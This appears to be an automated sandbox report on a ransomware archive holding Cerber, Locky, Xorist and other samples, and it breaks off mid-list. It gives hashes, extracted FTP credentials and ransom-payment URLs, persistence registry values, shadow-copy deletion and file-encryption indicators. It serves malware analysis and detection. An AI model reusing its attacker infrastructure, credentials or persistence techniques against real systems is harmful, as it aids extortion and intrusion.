Analysis
-
max time kernel
77s -
max time network
380s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 17:18
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00294.7z
Resource
win7-20240903-en
General
-
Target
RNSM00294.7z
-
Size
18.3MB
-
MD5
35f36146d16e76854de00c15cd264590
-
SHA1
9b9cbc5a04440a9e6f677bbced1ba1c87b3fa77f
-
SHA256
ac2e8a7e7efa633d42c18b4fb526aca8a64730f647bd31ee6dc739092051c837
-
SHA512
d17ade4aa19156b185655a33e9645ab0f1762558e8c0ddd441b23c931755ea0c21893a7e5446b8bbe27c504d0f355c556777e0400aba318e24d5ca9c472a837c
-
SSDEEP
393216:SBqZJmSJMZd5kVWyO7fIFmgUh1dAnA3cIDbfXGJ8o7hnvHEYML05Ei:ScZP+ZrHyOTknUh1dIkjXGmShnBML4B
Malware Config
Extracted
Protocol: ftp- Host:
ftp.unlockers.us - Port:
21 - Username:
[email protected] - Password:
1122334455
Extracted
C:\Users\Public\Videos\how_to_back_files.html
class="mark">[email protected]</span>
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+iabxp.txt
http://p57gest54celltraf743knjf.mottesapo.com/A97B535C5665D87
http://k4restportgonst34d23r.oftpony.at/A97B535C5665D87
http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A97B535C5665D87
http://fwgrhsao3aoml7ej.onion/A97B535C5665D87
http://fwgrhsao3aoml7ej.ONION/A97B535C5665D87
Extracted
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ireyp.txt
http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/A97B535C5665D87
http://kk4dshfjn45tsnkdf34fg.tatiejava.at/A97B535C5665D87
http://94375hfsjhbdfkj5wfg.aladadear.com/A97B535C5665D87
http://fwgrhsao3aoml7ej.onion/A97B535C5665D87
http://fwgrhsao3aoml7ej.ONION/A97B535C5665D87
Extracted
C:\Users\Admin\Contacts\_README_.hta
Extracted
C:\Users\Public\Recorded TV\_R_E_A_D___T_H_I_S___ZOP1Q_.txt
cerber
http://xpcx6erilkjced3j.onion/7035-0219-FB58-0098-952F
http://xpcx6erilkjced3j.17gcun.top/7035-0219-FB58-0098-952F
http://xpcx6erilkjced3j.1ebjjq.top/7035-0219-FB58-0098-952F
http://xpcx6erilkjced3j.15ezkm.top/7035-0219-FB58-0098-952F
http://xpcx6erilkjced3j.1mfmkz.top/7035-0219-FB58-0098-952F
http://xpcx6erilkjced3j.1jmu65.top/7035-0219-FB58-0098-952F
Signatures
-
Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
-
Cerber family
-
Detected Xorist Ransomware 4 IoCs
resource yara_rule behavioral1/memory/1532-452-0x0000000000400000-0x000000000055C000-memory.dmp family_xorist behavioral1/memory/1532-1088-0x0000000000400000-0x000000000055C000-memory.dmp family_xorist behavioral1/memory/1532-20054-0x0000000000400000-0x000000000055C000-memory.dmp family_xorist behavioral1/memory/1532-22900-0x0000000000400000-0x000000000055C000-memory.dmp family_xorist -
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
-
Locky family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\cache.dat" svchost.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5760 13340 mshta.exe 97 -
Xorist Ransomware
Xorist is a ransomware first seen in 2020.
-
Xorist family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (1496) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (999) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Clears Network RDP Connection History and Configurations 1 TTPs 4 IoCs
Remove evidence of malicious network connections to clean up operations traces.
pid Process 7884 reg.exe 13828 reg.exe 9740 reg.exe 7532 reg.exe -
Contacts a large (1646) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 11104 netsh.exe 9308 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\drv_xchrh.exe HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\drv_xchrh.exe HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe -
Executes dropped EXE 43 IoCs
pid Process 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 1164 HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1708 HEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exe 1644 HEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exe 2940 Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe 2804 Trojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exe 2192 Trojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exe 3036 Trojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exe 1884 HEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exe 1840 Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe 2084 Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe 2948 Trojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exe 1512 Trojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exe 448 Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe 2792 Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe 2684 Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe 972 Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe 2156 Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe 2944 Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe 468 Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe 1044 Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe 1836 Trojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exe 1348 Trojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exe 896 Trojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exe 568 Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe 1820 Trojan-Ransom.Win32.Zerber.eazv-9268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6.exe 2136 Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe 2496 VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe 1380 Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe 1532 Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe 2276 Trojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exe 2344 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 1492 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 2872 Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe 1716 Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe 1552 Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe 2832 svchost.exe 2588 VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.tmp 3388 Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe 2848 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe -
Loads dropped DLL 8 IoCs
pid Process 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 468 Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe 468 Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe 2344 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe 2496 VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe -
pid Process 11260 powershell.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 35 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Documents\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Music\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Searches\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Links\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files (x86)\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Music\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Videos\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Pictures\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Music\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Users\Public\Libraries\desktop.ini Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2084 Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe 6832 svchost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2320 set thread context of 768 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 70 PID 448 set thread context of 2872 448 Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe 72 PID 568 set thread context of 1716 568 Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe 73 PID 1044 set thread context of 1552 1044 Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe 79 PID 2684 set thread context of 3388 2684 Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe 88 PID 2344 set thread context of 2848 2344 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe 93 -
resource yara_rule behavioral1/files/0x0007000000016334-80.dat upx behavioral1/memory/972-118-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/3036-116-0x0000000000400000-0x00000000005F2000-memory.dmp upx behavioral1/files/0x0006000000017403-114.dat upx behavioral1/memory/1532-155-0x0000000000400000-0x000000000055C000-memory.dmp upx behavioral1/files/0x00050000000191f6-134.dat upx behavioral1/memory/1028-161-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/files/0x000600000001746a-104.dat upx behavioral1/memory/1028-98-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/3036-164-0x0000000000400000-0x00000000005F2000-memory.dmp upx behavioral1/memory/972-165-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/1532-452-0x0000000000400000-0x000000000055C000-memory.dmp upx behavioral1/memory/1492-454-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/files/0x000400000001cbfa-650.dat upx behavioral1/memory/2832-652-0x0000000000B60000-0x0000000000B80000-memory.dmp upx behavioral1/memory/972-926-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/1028-923-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/3036-927-0x0000000000400000-0x00000000005F2000-memory.dmp upx behavioral1/memory/1532-1088-0x0000000000400000-0x000000000055C000-memory.dmp upx behavioral1/memory/1492-6994-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/1492-13823-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/2832-18437-0x0000000000B60000-0x0000000000B80000-memory.dmp upx behavioral1/memory/972-18435-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/1532-20054-0x0000000000400000-0x000000000055C000-memory.dmp upx behavioral1/memory/1492-21451-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/972-22227-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/3036-22228-0x0000000000400000-0x00000000005F2000-memory.dmp upx behavioral1/memory/1532-22900-0x0000000000400000-0x000000000055C000-memory.dmp upx behavioral1/memory/2400-29740-0x0000000000400000-0x00000000005D3000-memory.dmp upx behavioral1/memory/1836-30105-0x0000000000400000-0x00000000005DE000-memory.dmp upx behavioral1/memory/1348-31062-0x0000000000400000-0x00000000005DF000-memory.dmp upx behavioral1/memory/14144-48405-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/972-69267-0x0000000000400000-0x0000000000535000-memory.dmp upx behavioral1/memory/1028-69294-0x0000000000400000-0x000000000053B000-memory.dmp upx behavioral1/memory/14144-69956-0x0000000000400000-0x0000000000535000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46B.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR14F.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Windows NT\TableTextService\es-ES\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\PREVIEW.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AD.XML Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_off.gif Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALENDAR.DPV Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14530_.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ11.POC Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.DPV Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png 